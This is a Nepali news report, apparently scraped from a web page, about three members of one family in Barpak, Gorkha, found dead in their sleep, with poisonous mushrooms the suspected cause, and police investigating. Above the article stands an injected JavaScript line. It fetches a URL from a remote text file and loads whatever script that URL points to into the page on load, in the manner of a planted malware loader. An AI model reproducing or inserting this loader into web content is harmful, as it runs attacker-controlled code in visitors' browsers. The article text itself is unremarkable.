;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
फागुन १०,
गोरखा । गाेरखाकाे बारपाक गाउँपालिकामा एकै परिवारका तीन जना मृत भेटिएका छन । लिवाचे टोलका अन्जादी ८५ वर्षका तीलबहादुर गुरुङ, उनकी बुहारी अन्दाजी २० वर्षीया आइतकुमारी गुरुङ र नातिनी १३ वर्षीया उषा गुरुङ सुतेकै ठाउँमा मृत भेटिएका हुन् ।
बिहान अबेरसम्म घरकाे ढाेका नखाेलेपछि गएर हेर्दा उनीहरुलाई मृतअवस्थामा फेला पारेकाे स्थानीयले बताएका छन् । विषालु च्याउ खाएका कारण उनीहरुकाे ज्यान गएकाे हुनसक्ने अनुमान लगाइएकाे छ ।
घटनाबारे अनुसन्धान गर्न बारपाक प्रहरी चौकीको टोली अहिले घटनास्थलमा रहेकाे तथा इलाका प्रहरी कार्यालय जौवारीको टोली पनि त्यसतर्फ जाँदै गरेकाे प्रहरीले जनाएकाे छ ।
फेसबुक प्रतिक्रियाहरु